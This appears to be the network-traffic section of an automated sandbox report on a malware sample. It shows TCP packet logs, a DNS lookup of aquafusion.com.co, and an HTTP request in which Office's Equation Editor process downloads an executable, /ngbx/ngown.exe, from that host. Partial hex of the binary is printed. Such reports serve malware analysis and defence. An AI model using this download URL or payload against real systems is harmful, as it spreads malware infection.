                          Dec 10, 2024 14:20:54.933592081 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.933765888 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.933823109 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.934467077 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.934524059 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.934750080 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.934770107 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.934794903 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.934839010 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.935379982 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.935420036 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.935528040 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.935578108 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.936105013 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.936156034 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.936165094 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.936218977 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.936810970 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.936868906 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.936908960 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.936949968 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.937552929 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.937593937 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.937959909 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.938015938 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.938626051 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.938638926 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.938688040 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.939265013 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.939280033 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.939320087 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.939320087 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.939960957 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.940018892 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.940042019 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.940078020 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.940939903 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.940990925 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.940994024 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.941059113 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.941523075 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.941534042 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.941577911 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.941579103 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.942235947 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.942289114 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.942637920 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.942679882 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.943094969 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.943108082 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.943161964 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.943996906 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.944010973 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.944061041 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.944709063 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.944720984 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.944758892 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.945400953 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.945413113 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.945483923 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.946155071 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.946209908 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.946213961 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.946265936 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.946959019 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.947026014 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.947346926 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.947392941 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.947772980 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.947784901 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.947817087 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.947839022 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.948713064 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.948725939 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.948765039 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.949575901 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.949588060 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.949640989 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.949640989 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.950265884 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.950334072 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.950344086 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.950395107 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.955718040 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.955802917 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.955857038 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.955883980 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.956078053 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.956131935 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.956132889 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.956146002 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.956192970 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.956192970 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.956661940 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.956731081 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.956731081 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.956773043 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.957412004 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.957488060 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.104825020 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.104934931 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.104943991 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.105304956 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.105345011 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.105345011 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.105514050 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.105551958 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.105943918 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.106029987 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.106066942 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.106141090 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.106769085 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.106851101 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.107069969 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.107178926 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.107433081 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.107476950 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.107724905 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.107765913 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.108215094 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.108267069 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.108268023 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.108930111 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.108975887 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.108975887 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.109165907 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.109267950 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.109786034 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.109831095 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.109860897 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.109942913 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.110465050 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.110594034 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.110630035 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.110630035 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.111491919 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.111505032 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.111793041 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.112025976 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.112066984 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.112138987 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.112215996 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.112807035 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.112848997 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.112925053 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.113008022 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.113523960 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.113567114 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.113631010 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.113692999 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.114326000 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.114403963 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.114463091 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.114533901 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.115219116 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.115333080 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.115345001 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.115403891 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.115884066 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.115956068 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.115997076 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.116066933 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.116657972 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.116708994 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.116729975 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.116884947 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.117453098 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.117500067 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.117744923 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.117793083 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.118175030 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.118218899 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.118552923 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.118633032 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.119045973 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.119107962 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.119236946 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.119296074 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.119851112 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.119863987 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.119899988 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.119925976 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.120572090 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.120634079 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.120671988 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.120721102 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.121325970 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.121337891 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.121371984 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.121395111 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.122167110 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.122179985 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.122232914 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.122232914 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.122855902 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.122900963 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.122940063 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.122940063 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.123768091 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.123780966 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.123842955 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.124444008 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.124495983 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.124806881 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.124917030 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.125560045 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.125572920 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.125612974 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.125612974 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.126137972 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.126148939 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.126276016 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.126909971 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.126921892 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.126965046 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.127610922 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.127623081 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.127686977 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.128552914 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.128566027 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.128604889 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.129317045 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.129332066 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.129369974 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.129369974 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.129936934 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.129950047 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.130038977 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.130776882 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.130789995 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.130893946 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.131571054 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.131583929 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.131622076 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.132369995 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.132380962 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.132427931 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.133183002 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.133197069 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.133244991 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.133244991 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:57.483443975 CET4916580192.168.2.22190.90.160.170

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Dec 10, 2024 14:20:51.070528984 CET5456253192.168.2.228.8.8.8
                          Dec 10, 2024 14:20:51.811662912 CET53545628.8.8.8192.168.2.22

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Dec 10, 2024 14:20:51.070528984 CET192.168.2.228.8.8.80x5b3eStandard query (0)aquafusion.com.coA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Dec 10, 2024 14:20:51.811662912 CET8.8.8.8192.168.2.220x5b3eNo error (0)aquafusion.com.co190.90.160.170A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • aquafusion.com.co

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.2249165190.90.160.170803608C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          TimestampBytes transferredDirectionData
                          Dec 10, 2024 14:20:51.945811987 CET318OUTGET /ngbx/ngown.exe HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: aquafusion.com.co
                          Connection: Keep-Alive
                          Dec 10, 2024 14:20:53.183305979 CET1236INHTTP/1.1 200 OK
                          Connection: Keep-Alive
                          Keep-Alive: timeout=5, max=100
                          content-type: application/x-msdownload
                          last-modified: Tue, 10 Dec 2024 07:12:19 GMT
                          accept-ranges: bytes
                          content-length: 1051136
                          date: Tue, 10 Dec 2024 13:20:52 GMT
                          server: LiteSpeed
                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bd 94 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 28 07 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED]
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6r}r}r}4,"p}s}/A}/#}/"G}{@{}{PW}r}R)"}s}/s}r}Ts}s}Richr}PELWg"(}@@@@L|pq+pH@.text `.rdata@@.datatR@.rsrcp@@.relocqr@B
                          Dec 10, 2024 14:20:53.183404922 CET488INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 44 41 4c 00 e8 b7 a2 03 00 68 59 b5 43 00 e8 2c 1d 02 00 59 c3 e8 59 39 00 00 68 63 b5
                          Data Ascii: DALhYC,YY9hcCY8hiCYhnCYM,hsCYhxCYQh}CYSLQ@SLP_hCY1hCYshCYgL
                          Dec 10, 2024 14:20:53.183410883 CET1236INData Raw: 10 4b 79 f3 83 8e 8c 01 00 00 ff 33 c0 83 8e 90 01 00 00 ff 83 8e bc 01 00 00 ff 83 8e c0 01 00 00 ff 89 86 6c 01 00 00 89 86 70 01 00 00 89 86 74 01 00 00 89 86 78 01 00 00 89 86 7c 01 00 00 89 86 80 01 00 00 88 86 84 01 00 00 89 86 88 01 00 00
                          Data Ascii: Ky3lptx|f_^[V4HWLPtXLj0^U]dUWLVuWVl
                          Dec 10, 2024 14:20:53.183517933 CET1236INData Raw: e8 85 0f 00 00 8b 0d 10 58 4c 00 8b 0c 81 8b 09 ff 71 1c 50 e8 86 0c 00 00 6a 00 ff 75 0c 6a 07 ff 75 08 ff 15 84 f5 48 00 5d c2 08 00 55 8b ec ff 75 08 b9 b0 57 4c 00 e8 4d 0f 00 00 50 e8 50 09 00 00 6a 00 6a 00 6a 02 ff 75 08 ff 15 84 f5 48 00
                          Data Ascii: XLqPjujuH]UuWLMPPjjjuH]UQSVuWL!uWLVEMIIut-$XLtSuu\^[]xHuVuh8U\SVWuWL
                          Dec 10, 2024 14:20:53.183523893 CET1236INData Raw: 85 c0 74 08 3b b0 80 00 00 00 75 3e 8b 5e 04 85 db 0f 85 1e 9f 03 00 8b 87 c8 01 00 00 3b f0 75 3e 8b 06 89 87 c8 01 00 00 56 e8 a1 f2 01 00 8b 45 0c 59 85 c0 74 13 5b 6a 01 6a 00 ff 37 ff 15 58 f6 48 00 5f 5e 5d c2 08 00 85 c0 75 1b 8b b7 c8 01
                          Data Ascii: t;u>^;u>VEYt[jj7XH_^]uMt9t6UM$uE(@S]#E(VW} jQuWSuuQhHhHPuuENLfEhf
                          Dec 10, 2024 14:20:53.183547020 CET1236INData Raw: 57 e8 0b fb ff ff 83 7f 18 00 0f 85 63 9c 03 00 8b 0d 34 58 4c 00 6a 03 5a 89 55 fc 3b ca 0f 8c ad 00 00 00 a1 24 58 4c 00 8b 04 90 8b 30 85 f6 0f 84 8c 00 00 00 8b 46 04 3b 47 04 0f 85 80 00 00 00 0f b6 86 90 00 00 00 83 e8 0a 0f 84 7b 9c 03 00
                          Data Ascii: Wc4XLjZU;$XL0F;G{r:VW~dk~hs~D{~P>t6<H&uWL4XLUBU;Vu V$ZXLt
                          Dec 10, 2024 14:20:53.183556080 CET1236INData Raw: 04 00 83 8e 98 00 00 00 ff 83 8e 94 00 00 00 ff e9 6a ff ff ff 55 8b ec 51 8b 0d 28 58 4c 00 56 57 39 0d 30 58 4c 00 75 6e 81 3d 34 58 4c 00 ff ff 00 00 0f 84 8e 00 00 00 68 a0 00 00 00 e8 6f e8 01 00 59 85 c0 0f 84 80 00 00 00 8b c8 e8 22 0e 00
                          Data Ascii: jUQ(XLVW90XLun=4XLhoY"E}P XL54XLF54XL$XL0XL9MIO_^]j^3;~$XL98u#hYt3F;|UVuWt$jV\H;Gxs
                          Dec 10, 2024 14:20:53.183764935 CET1236INData Raw: f6 48 00 6a ff 57 b9 b0 57 4c 00 e8 5c f9 ff ff 83 3d d4 57 4c 00 00 75 16 68 56 12 40 00 6a 28 6a 00 6a 00 ff 15 18 f7 48 00 a3 d4 57 4c 00 ff 05 d0 57 4c 00 b9 b0 57 4c 00 6a 00 89 35 1c 58 4c 00 e8 47 05 00 00 f7 c3 00 00 00 10 0f 85 7f 97 03
                          Data Ascii: HjWWL\=WLuhV@j(jjHWLWLWLj5XLG_^[] 3"'MPMRU}WWL^XLt{XL3V0M8V:tV:9D}zttdttQtC~)1~8
                          Dec 10, 2024 14:20:53.183770895 CET1236INData Raw: ff 36 ff 15 10 f5 48 00 8d 4d 2c e8 04 6a 00 00 8b c7 5f 5e 5b 8b e5 5d c2 34 00 8a 45 f4 e9 74 ff ff ff ff 73 50 57 e8 79 59 08 00 eb c4 ff 73 54 57 e8 62 57 08 00 eb bf 83 65 f4 00 e9 4c 9f 03 00 aa c9 43 00 c8 c9 43 00 e6 c9 43 00 04 ca 43 00
                          Data Ascii: 6HM,j_^[]4EtsPWyYsTWbWeLCCCC"C@C|CCCCBC^CC+CnCCCCCTCrC.@/CCCC6C&.@^CCU}VuNlF`^f@h]uFlUQQE
                          Dec 10, 2024 14:20:53.183790922 CET1236INData Raw: 83 cf ff 8d 4e 14 89 1e 89 7e 04 89 5e 08 89 5e 0c 89 5e 10 e8 ce 42 00 00 8d 4e 24 e8 c6 42 00 00 8d 4e 54 89 5e 34 89 5e 38 89 5e 3c 89 5e 40 89 5e 44 89 7e 48 89 7e 4c 89 5e 50 e8 a6 42 00 00 89 5e 64 8b c6 89 5e 68 89 5e 70 89 5e 78 c7 46 7c
                          Data Ascii: N~^^^BN$BNT^4^8^<^@^D~H~L^PB^d^h^p^xF|fffff_^[USVj[F9Ft&SYtOMNFF^[]jX;s(3FWQI~
                          Dec 10, 2024 14:20:53.302963972 CET1236INData Raw: 08 e8 aa 20 00 00 8d 4d f0 e8 5e 60 00 00 8b 75 bc 8d 4d f0 e8 fa 3d 00 00 8d 45 f0 50 8d 4d a0 e8 57 06 00 00 8b 7d f0 57 68 44 fa 48 00 e8 76 f6 01 00 59 59 85 c0 0f 84 1e 99 03 00 57 68 1c fa 48 00 e8 61 f6 01 00 59 59 85 c0 0f 84 25 99 03 00
